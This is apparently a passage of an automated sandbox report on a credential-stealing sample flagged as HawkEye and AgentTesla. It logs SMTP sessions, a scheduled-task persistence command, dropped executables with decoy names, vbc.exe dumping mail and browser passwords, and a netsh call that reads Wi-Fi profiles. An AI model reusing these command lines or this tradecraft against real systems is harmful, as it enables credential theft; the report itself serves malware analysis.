Jan 14, 2021 08:02:17.745964050 CET	587	49832	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:17.746226072 CET	49832	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:17.936898947 CET	587	49832	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:17.937329054 CET	49832	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:18.127619982 CET	587	49832	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:02:23.349724054 CET	587	49833	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:23.352009058 CET	49833	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:23.542123079 CET	587	49833	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:23.543831110 CET	49833	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:23.733742952 CET	587	49833	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:02:23.791246891 CET	587	49834	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:23.791553974 CET	49834	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:23.981687069 CET	587	49834	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:23.981918097 CET	49834	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:24.171911001 CET	587	49834	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:02:25.909921885 CET	587	49835	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:25.910132885 CET	49835	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:26.100660086 CET	587	49835	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:26.100920916 CET	49835	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:26.291158915 CET	587	49835	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:02:27.035151958 CET	587	49836	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:27.035372972 CET	49836	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:27.228023052 CET	587	49836	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:27.228200912 CET	49836	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:27.418167114 CET	587	49836	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:02:28.561914921 CET	587	49837	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:28.564661980 CET	49837	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:28.756741047 CET	587	49837	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:28.757129908 CET	49837	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:28.947220087 CET	587	49837	199.193.7.228	192.168.2.3	220 Ready to start TLS

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: B6LNCKjOGt5EmFQ.exe PID: 6076 Parent PID: 5672

General

Start time:	08:00:10
Start date:	14/01/2021
Path:	C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe'
Imagebase:	0xfe0000
File size:	1891328 bytes
MD5 hash:	80D255A6A5EC339E15D6FEC3C0FEF666
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.280603529.000000000369E000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 4812 Parent PID: 6076

General

Start time:	08:00:35
Start date:	14/01/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TcVfsyyjYuQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpDAC4.tmp'
Imagebase:	0x1380000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5352 Parent PID: 4812

General

Start time:	08:00:36
Start date:	14/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: B6LNCKjOGt5EmFQ.exe PID: 5640 Parent PID: 6076

General

Start time:	08:00:36
Start date:	14/01/2021
Path:	C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x510000
File size:	1891328 bytes
MD5 hash:	80D255A6A5EC339E15D6FEC3C0FEF666
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: B6LNCKjOGt5EmFQ.exe PID: 5336 Parent PID: 6076

General

Start time:	08:00:37
Start date:	14/01/2021
Path:	C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x7ff7ca4e0000
File size:	1891328 bytes
MD5 hash:	80D255A6A5EC339E15D6FEC3C0FEF666
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.291239624.0000000004451000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.283351079.000000000134C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.289168879.0000000003E3C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.287788541.00000000044BD000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.278201176.000000000138F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.285048922.0000000004451000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.278060140.0000000001324000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.287852153.0000000003DD1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.286730546.00000000044BD000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: LOGO AND PICTURES.exe PID: 6208 Parent PID: 5336

General

Start time:	08:00:39
Start date:	14/01/2021
Path:	C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe' 0
Imagebase:	0xdb0000
File size:	456192 bytes
MD5 hash:	D9001138C5119D936B70BF77E136AFBE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000009.00000002.604546258.0000000000DB2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000009.00000000.281199501.0000000000DB2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: Pictures.exe PID: 6240 Parent PID: 5336

General

Start time:	08:00:40
Start date:	14/01/2021
Path:	C:\Users\user\AppData\Local\Temp\Pictures.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\Pictures.exe' 0
Imagebase:	0x150000
File size:	533504 bytes
MD5 hash:	25146E9C5ECD498DD17BA01E6CFAEB24
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.329671193.0000000003921000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.329671193.0000000003921000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.327595878.000000000295F000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.327595878.000000000295F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: PO456724392021.exe PID: 6292 Parent PID: 5336

General

Start time:	08:00:41
Start date:	14/01/2021
Path:	C:\Users\user\AppData\Local\Temp\PO456724392021.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\PO456724392021.exe' 0
Imagebase:	0xab0000
File size:	221696 bytes
MD5 hash:	F38E2D474C075EFF35B4EF81FDACA650
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.284660390.0000000000AB2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.612763581.0000000002D81000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.612763581.0000000002D81000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.604664953.0000000000AB2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.612958072.0000000002DD2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.612958072.0000000002DD2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: PO2345714382021.exe PID: 6488 Parent PID: 5336

General

Start time:	08:00:42
Start date:	14/01/2021
Path:	C:\Users\user\AppData\Local\Temp\PO2345714382021.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\PO2345714382021.exe' 0
Imagebase:	0x5d0000
File size:	220672 bytes
MD5 hash:	9B79DE8E3AD21F14E71E55CFA6AE4727
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000000.287649744.00000000005D2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: dw20.exe PID: 6740 Parent PID: 6240

General

Start time:	08:00:45
Start date:	14/01/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit):	true
Commandline:	dw20.exe -x -s 2184
Imagebase:	0x10000000
File size:	33936 bytes
MD5 hash:	8D10DA8A3E11747E51F23C882C22BBC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 6836 Parent PID: 6240

General

Start time:	08:00:48
Start date:	14/01/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000013.00000002.301913637.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 6848 Parent PID: 6240

General

Start time:	08:00:48
Start date:	14/01/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000014.00000002.308380033.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: netsh.exe PID: 6184 Parent PID: 6208

General

Start time:	08:01:13
Start date:	14/01/2021
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	'netsh' wlan show profile
Imagebase:	0xcb0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6168 Parent PID: 6184

General

Start time:	08:01:14
Start date:	14/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: B6LNCKjOGt5EmFQ.exe PID: 6076 Parent PID: 5672 B6LNCKjOGt5EmFQ.exeCOMMON

Executed Functions

Function 01C59690, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01C598D6

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 527cd971310c8b16f8eb438b96a3b4289f9b74f8938541850a353fe8c2f2e712
Instruction ID: 9edc30509721310d7524855d0b0ee483ab4e4736b974adc822127b2139dc5cef
Opcode Fuzzy Hash: 527cd971310c8b16f8eb438b96a3b4289f9b74f8938541850a353fe8c2f2e712
Instruction Fuzzy Hash: E6712370A00B05CFDBA4DF6AD04075ABBF1FF88248F10896EE94AD7A40DB34E945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01C55715, Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01C557D1

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b100ec81d31d627a16b4c0ad31300603a90fec01ec0b170c9bc50bac89316224
Instruction ID: 2c927a179742b31f9cfb3bfc9c7df89d6d69636bfa43fec8d4244698571b86c6
Opcode Fuzzy Hash: b100ec81d31d627a16b4c0ad31300603a90fec01ec0b170c9bc50bac89316224
Instruction Fuzzy Hash: 0E51D2B1D00619CFDB20DFA9C884BDEBBF5BF48314F24806AD518AB251D774A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01C53F28, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01C557D1

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9955174337d8ea450f84ac4037adc14c7562540d55ae69700b5ac21d81c5d896
Instruction ID: 668bb37474e3f3f144057bd5836f36c0cfb16325467bd18dd1a9d90602dbe548
Opcode Fuzzy Hash: 9955174337d8ea450f84ac4037adc14c7562540d55ae69700b5ac21d81c5d896
Instruction Fuzzy Hash: 8641E2B0C0461CCBDF64DFA9C884B9EBBB5BF48304F248069E509AB251DB756985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01C5B1B4, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01C5BB76,?,?,?,?,?), ref: 01C5BC37

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 291cb94fd75e691fc856805e02c4b68b0391156eeee086fdea7d679383182726
Instruction ID: 22a87210b3501315074ffac92993b00025be614c456c46ee287c6e99218ce08f
Opcode Fuzzy Hash: 291cb94fd75e691fc856805e02c4b68b0391156eeee086fdea7d679383182726
Instruction Fuzzy Hash: 9121F2B5900248DFDF10CFAAD884AEEBFF8EB48320F14801AE914A7350C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01C590C0, Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01C59951,00000800,00000000,00000000), ref: 01C59B62

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d673df061f119be3f7ae0d124b9f31036d6c53728ffa05ce55b998a83e71cc3
Instruction ID: f45f123222578d6a023ae1db1c4351262209f19ea390a0326ad420da82807c9f
Opcode Fuzzy Hash: 2d673df061f119be3f7ae0d124b9f31036d6c53728ffa05ce55b998a83e71cc3
Instruction Fuzzy Hash: 942168B6C04348CFDF10DFAAC844ADEFFF4AB88214F15845AE919AB601C375A545CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 01C5BBAB, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01C5BB76,?,?,?,?,?), ref: 01C5BC37

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f9bd03c73626b01cee12e9941aa0726ea5f2f8d17cd7e48d9e4a37bbde7140f3
Instruction ID: e6956de2e1b7b39f3e93d883e1d224fd9a12293859402b772ad0d98090178e85
Opcode Fuzzy Hash: f9bd03c73626b01cee12e9941aa0726ea5f2f8d17cd7e48d9e4a37bbde7140f3
Instruction Fuzzy Hash: 3321E3B5900259DFDB10DFA9D984ADEFBF4FB48320F14841AE914A7350C374AA54CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01C590D8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01C59951,00000800,00000000,00000000), ref: 01C59B62

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 79c51e859b66d118581da5928ece62c89d5940c013229be0196cc5e571cab2e3
Instruction ID: 8d869abc7ed6df83572e0e0c4e5c75490806e252398286fa0b5572d48f03319a
Opcode Fuzzy Hash: 79c51e859b66d118581da5928ece62c89d5940c013229be0196cc5e571cab2e3
Instruction Fuzzy Hash: E41117B5D00249CFDF10DF9AC484ADEFBF4EB48314F10856AE919A7600C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01C59AF0, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01C59951,00000800,00000000,00000000), ref: 01C59B62

Memory Dump Source

Source File: 00000000.00000002.279924930.0000000001C50000.00000040.00000001.sdmp, Offset: 01C50000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5b559f2318525ac74d2468f32c0887b9632e9c15f4608f0ebe7577ffea263c4a
Instruction ID: e764ed983b4481f4ad50ceefc5eeb28c6f06f376c3dfaf62fd3f4ab6a69f27ad
Opcode Fuzzy Hash: 5b559f2318525ac74d2468f32c0887b9632e9c15f4608f0ebe7577ffea263c4a
